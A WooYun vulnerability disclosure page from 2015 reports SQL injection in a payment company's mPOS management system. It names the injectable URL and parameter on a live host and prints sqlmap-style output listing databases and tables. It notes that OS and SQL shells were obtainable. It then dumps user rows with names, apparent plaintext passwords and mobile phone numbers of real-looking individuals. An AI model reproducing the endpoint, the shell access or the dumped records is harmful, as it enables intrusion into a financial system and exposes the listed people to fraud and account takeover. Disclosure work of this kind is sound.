联汇通宝某系统SQL注入（涉及4000商户/营业执照/身份证/银行卡/验证码等信息） | wooyun-2015-0155237

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0155237

漏洞标题：

联汇通宝某系统SQL注入（涉及4000商户/营业执照/身份证/银行卡/验证码等信息）

漏洞详情

披露状态：

2015-11-23：细节已通知厂商并且等待厂商处理中
2015-11-27：厂商已经确认，细节仅向厂商公开
2015-12-07：细节向核心白帽子及相关领域专家公开
2015-12-17：细节向普通白帽子公开
2015-12-27：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

详细说明：

厂商是联汇通宝
存在注入
http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos id=
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] channel
[*] distribution
[*] dy_cd_lhtb
[*] lhtmposmerchant
[*] master
[*] model
[*] msdb
[*] railroad
[*] tempdb
[*] trainsms
可执行-os-shell
sql-shell

存在的表：

Database: lhtmposmerchant
[79 tables]
+-------------------------------+
| db_area                       |
| db_billorder_record           |
| db_bulletin                   |
| db_channel_applyUsheild       |
| db_channel_dayprofit          |
| db_channel_product_costconfig |
| db_channel_product_type       |
| db_channel_profitstatistics   |
| db_channel_rechargelog        |
| db_city                       |
| db_credit_usedquota           |
| db_lhb_user                   |
| db_lhbblackgold_jsrecord      |
| db_lhbblackgold_profit        |
| db_lhbdebit_credit_order      |
| db_lhbgold_profit             |
| db_lhbjhc_jsrecord            |
| db_lhbjhc_profit              |
| db_lhbjhf_jsrecord            |
| db_lhbjhf_profit              |
| db_lhbjhn_jsrecord            |
| db_lhbjhn_profit              |
| db_lhbjht_jsrecord            |
| db_lhbjht_profit              |
| db_lhbjhy_jsrecord            |
| db_lhbjhy_profit              |
| db_lhbptgold_jsrecord         |
| db_lhbptgold_profit           |
| db_lhbrate_config             |
| db_lhbsilver_profit           |
| db_lhbvipos_order             |
| db_lhbwhitegold_profit        |
| db_lhbyz_channelrate          |
| db_lhbyzrate_config           |
| db_lhmall_order_product       |
| db_lhmall_order_product       |
| db_lhplaneTicket_order        |
| db_lhtmpos_billlog            |
| db_lhtmpos_billorder          |
| db_lhtmpos_order              |
| db_lhtmpos_txnorder           |
| db_lhtrainTicket_order        |
| db_lhtrate_config             |
| db_lhtvipos_order             |
| db_lhtvipos_rates             |
| db_liquidationbankcode        |
| db_log                        |
| db_member                     |
| db_menu                       |
| db_merchant_config            |
| db_mpos_channelassign         |
| db_mpos_channelassign         |
| db_mpos_channelrate           |
| db_mpos_lhbrate               |
| db_mpos_merchant              |
| db_mpos_terminal              |
| db_newlhb_user                |
| db_noqrhmobile                |
| db_pay_product_log            |
| db_power                      |
| db_product_apply              |
| db_product_buyrecords         |
| db_product_class              |
| db_product_data               |
| db_product_salecost_config    |
| db_product_salecost_config    |
| db_product_saleman            |
| db_province                   |
| db_role                       |
| db_sellagency                 |
| db_sms_send                   |
| db_sms_wait                   |
| db_subdistributor             |
| db_tempmobile                 |
| db_terminal_user              |
| db_user                       |
| db_vipuser_rate               |
| db_youze_profitstatistics     |
| sqlmapoutput                  |
+-------------------------------+

部分用户

select * from db_user [36]:
[*] 01  2 2014  1:16PM,  , 448, 1, VIPOS-陶善忠, 176335, 9, 3, 0, 0, 13032191313
[*] 01  2 2014  2:29PM,  , 449, 1, VIPOS-王晓鹤, wxh800918, 9, 3, 0, 0, 15312155678
[*] 01  2 2014  3:12PM,  , 450, 1, VIPOS-徐育红, 218321, 9, 3, 0, 0, 13962412277
[*] 01  2 2014  3:18PM,  , 451, 1, VIPOS-陈芳, 206323, 9, 3, 0, 0, 18962636627
[*] 01  2 2014  4:20PM,  , 452, 1, VIPOS-纪海, 192179, 9, 3, 0, 0, 15618389748
[*] 01  2 2014  4:29PM,  , 453, 1, VIPOS-胡国宏, 242510, 9, 3, 0, 0, 15901994055
[*] 01  2 2014  4:50PM,  , 454, 1, VIPOS-蒋海, 103619, 9, 3, 0, 0, 18914950187
[*] 01  2 2014  9:44AM,  , 447, 1, VIPOS-欧林芝, 250546, 9, 3, 0, 0, 13611933901
[*] 01  3 2014  1:52PM,  , 456, 1, VIPOS-王成璋, 043210, 9, 3, 0, 0, 13882177061
[*] 01  3 2014  2:05PM,  , 457, 1, VIPOS-吴慧红, 096026, 9, 3, 0, 0, 15800359836
[*] 01  3 2014 11:11AM,  , 455, 1, VIPOS-路纯, 017533, 9, 3, 0, 0, 13732671518
[*] 01  6 2014  1:07PM, , 461, 1, VIPOS-甘霖, 220042, 9, 3, 0, 0, 13939945338
[*] 01  6 2014  1:32PM, , 462, 1, VIPOS-庞大江, 249180, 9, 3, 0, 0, 13375151875
[*] 01  6 2014  2:04PM,  , 463, 1, VIPOS-裴学丽, 8888, 8, 2, 1, 0, peixueli
[*] 01  6 2014  2:11PM, , 464, 1, VIPOS-向荣, 01724X, 9, 3, 0, 0, 13983211607
[*] 01  6 2014  2:31PM, , 465, 1, VIPOS-杨竹丽, 160885, 9, 3, 0, 0, 13698886899
[*] 01  6 2014  4:32PM, , 468, 1, VIPOS-丁裕菊, 075827, 9, 3, 0, 0, 13906282112
[*] 01  6 2014 11:02AM, , 459, 1, VIPOS-孙培培, 030489, 9, 3, 0, 0, 18616122858
[*] 01  6 2014 12:00AM, , 458, 10, 汪霞白-财务, 123, 5, 1, 0, 0, wangxiabai
[*] 01  6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01  6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01  6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01  6 2015  8:49AM, , 1392, 1, VIPOS-RHXT刘林, 115411, 9, 3, 0, 0, 13458678768
[*] 01  7 2014  1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01  7 2014  1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01  7 2014  1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01  7 2014  4:56PM,  , 472, 1, VIPOS-唐秋儿, 8888, 8, 2, 1, 0, tangqiuer
[*] 01  7 2014 12:00AM, , 115, 1, VIPOS-李文娟, 8888, 8, 2, 1, 0, liwenjuan
[*] 01  7 2014 12:01PM,  , 469, 1, VIPOS-王晓鹤, 8888, 8, 2, 1, 0, wangxiaohe
[*] 01  7 2015  1:32PM, , 1397, 1, VIPOS-RHXT娄晓倩, 115411, 9, 3, 0, 0, 15881576086
[*] 01  7 2015  1:33PM, , 1398, 1, VIPOS-董樊, 115411, 9, 3, 0, 0, 15928406481
[*] 01  7 2015 10:27AM, , 1395, 1, VIPOS-冯高峰, 264911, 9, 3, 0, 0, 13541222112
[*] 01  7 2015 10:28AM, , 1396, 1, VIPOS-刘昌建, 264911, 9, 3, 0, 0, 13540490546
[*] 01  8 2014  9:31AM, , 474, 1, VIPOS-陆文俊, socl8899, 9, 3, 0, 0, 13918788846
[*] 01  8 2014  9:39AM, , 475, 1, VIPOS-张金凤, 015042, 9, 3, 0, 0, 13918190877
[*] 01  8 2014 12:00AM, , 477, 1, VIPOS-王玲凤, 118913, 8, 2, 1, 0, wlf